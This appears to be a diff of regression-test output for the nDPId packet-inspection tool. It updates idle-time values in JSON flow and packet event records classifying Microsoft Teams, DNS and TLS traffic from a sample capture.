+00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1158,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682376,"flow_last_seen":1587041682423,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":236,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041682423,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1159,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587041682440,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041682440,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES9AAEARZ+LAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAHT\/ICoAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1185,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041682369,"flow_last_seen":1587041682557,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1587041682557,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041682611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1189,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041682598,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -168,41 +168,41 @@ 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1193,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682668,"flow_last_seen":1587041682668,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041682668,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1587041682697,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1587041682697,"pkt":"KDc3AG3IEBMx8Tl2CABFAACny9dAADkR8hbAqAEBwKgBBgA14LoAkwAALzeBgAABAAIAAAAACHByZXNlbmNlCHNlcnZpY2VzA3NmYg50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAASwANRRhLXVwcy1wcmVzZW5jZTQtcHJvZAtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AwEYAAQABAAAABgAENHJNOg=="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1201,"source":"teams.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041682668,"flow_last_seen":1587041682697,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1587041682697,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57530,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"},"dns": {"query":"presence.services.sfb.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.77.58"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682698,"flow_last_seen":1587041682698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682698,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1587041682698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682698,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG913AqAEGNHJNOuyBAbtgCOGqAAAAALAC\/\/\/jdgAAAgQFtAEDAwUBAQgKMISvtwAAAAAEAgAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1587041682740,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEdws9AADEGDl2ifRODwKgBBgG767gSqyGfi6a7DoAYAWi65wAAAQEICpHNoqswhBBbFwMDAOQAAAAAAAAACKmKftpP18TObpudfRHF+x2Q26rJbEiP394UtjZJPj4wSIR\/hp3JlNrAGtpUw45IgQ+\/Td3gBgwIaydoMxwS3i93S6aIvQahVpj\/c5RwIn5XTgvMLlxphbaNgBQKVcUBzOyFCFmX25bboaZrE8yGPewBV8YF9rPw3wiL2qX6gOrVwGBD+SxN5WBWFI2hGO+JWJUmRSYMjHC+44xSTFiyxGwuYeySW1fNosn1ZrrnxmEfRHvkqjQUYvkmRW87MNYmA\/nzpUUAJUjx7fyAlsSNV0cWWtSO31yX1lU5orE="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1587041682740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682740,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwxXAqAEGon0Tg+u4AbuLprsOEqsiiIAQD\/hw3AAAAQEICjCEr+CRzaKr"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA09YRAAGwG1eQ0ck06wKgBBgG77IG+FZNKYAjhq4AS\/\/+qaAAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG93XAqAEGNHJNOuyBAbtgCOGrvhWTS1AQIADLJwAA"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1587041682745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":665,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":665,"pkt_l4_len":631,"thread_ts_msec":1587041682745,"pkt":"EBMx8Tl2KDc3AG3ICABFAAKLAABAAEAGwL7AqAEGon0Tg+u4AbuLprsOEqsiiIAYEAA0LgAAAQEICjCEr+ORzaKrFwMDAlK2BaXSajSAVWEKj3frXxijYpT3GD2Cuos6bxaeeEb0O6UJhzmzPZI\/SWy+fgBnTfneCwusduYkx4s3F4xCn2MY3DEvpr\/P48ATzKlJ++OHqI7OI3KpokJ1bF8YwJjJpFyWkPT0\/gdDA2C0thwexYlLgVCHe4dECfAKO3ai6a9AkpIGftSCmWnSsB7\/GodcDd1wDIWHn+mS6A9bTO\/2sRCfLQjmwaqnM\/0Kd1DorrQMm9TT6\/w11NzOyGJGqVRWfthWKCJ2r5CEFaogXR64MxPpr2FM6spcuDUY4C3Hc53Q7uc97BndljPBEgsGGu2WIs1hpBKyBrbp4cakeWFrgRHILDge\/JLjoB\/we0ie6rPfHdzAzbH+CVHboc7ECVvIV6N2Rd\/z5fI6cJ5y1i\/CGpe9JS\/DjF+npNlL3gVvBs3y7VpT4ziTRBRlbzG6hzfaYWVE\/I1GNwloup0kRP0\/\/fFg59buQBmTxdHJsfm4laPDQEGg2\/E9TD5wbcmagME1tYB8Z6HaDDAe1MbrBXtLSM8VMS0ZeI23LZfgw6dIscXGQh+EZCVohYQ2K\/dCOtZqYIGlXsZd11O+bX\/KPVaVnsGCQqimWVbYkJXTdkE5fdL4ibwUdj8vI7+8IXUv8oArxAdVEWB2+pth6d9Zti7C4SxMlmajA50jkJHElO8G4w6Wzb86qkyK4WbkuYLazUSRxEvrQrVtZjtDDcEAhbB3i\/CCiXoyK9403MAI7UV+NXn0+Iqmacnoi+GSVKkccDjbrlFQ3qxHSBpnh\/Zt22FSB4TV4eA="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682809,"flow_last_seen":1587041682809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682809,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1587041682809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682809,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyCEVImrEWfAAAAALAC\/\/+rgAAAAgQFtAEDAwUBAQgKMISwIQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1587041682862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7ILLfLe3JqxFoKAS\/ogNbwAAAgQFrAQCCAoTeRnVMISwIQEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1587041682862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyCEVImrEWgy3y3uIAQECwqYQAAAQEICjCEsFATeRnV"} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682698,"flow_last_seen":1587041682698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682698,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1587041682698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682698,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG913AqAEGNHJNOuyBAbtgCOGqAAAAALAC\/\/\/jdgAAAgQFtAEDAwUBAQgKMISvtwAAAAAEAgAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682740,"flow_last_seen":1587041682740,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1587041682740,"l3_proto":"ip4","src_ip":"162.125.19.131","dst_ip":"192.168.1.6","src_port":443,"dst_port":60344,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1587041682740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1587041682740,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEdws9AADEGDl2ifRODwKgBBgG767gSqyGfi6a7DoAYAWi65wAAAQEICpHNoqswhBBbFwMDAOQAAAAAAAAACKmKftpP18TObpudfRHF+x2Q26rJbEiP394UtjZJPj4wSIR\/hp3JlNrAGtpUw45IgQ+\/Td3gBgwIaydoMxwS3i93S6aIvQahVpj\/c5RwIn5XTgvMLlxphbaNgBQKVcUBzOyFCFmX25bboaZrE8yGPewBV8YF9rPw3wiL2qX6gOrVwGBD+SxN5WBWFI2hGO+JWJUmRSYMjHC+44xSTFiyxGwuYeySW1fNosn1ZrrnxmEfRHvkqjQUYvkmRW87MNYmA\/nzpUUAJUjx7fyAlsSNV0cWWtSO31yX1lU5orE="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1587041682740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682740,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwxXAqAEGon0Tg+u4AbuLprsOEqsiiIAQD\/hw3AAAAQEICjCEr+CRzaKr"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1587041682744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA09YRAAGwG1eQ0ck06wKgBBgG77IG+FZNKYAjhq4AS\/\/+qaAAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1587041682744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041682744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAG93XAqAEGNHJNOuyBAbtgCOGrvhWTS1AQIADLJwAA"} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1212,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682698,"flow_last_seen":1587041682744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041682744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 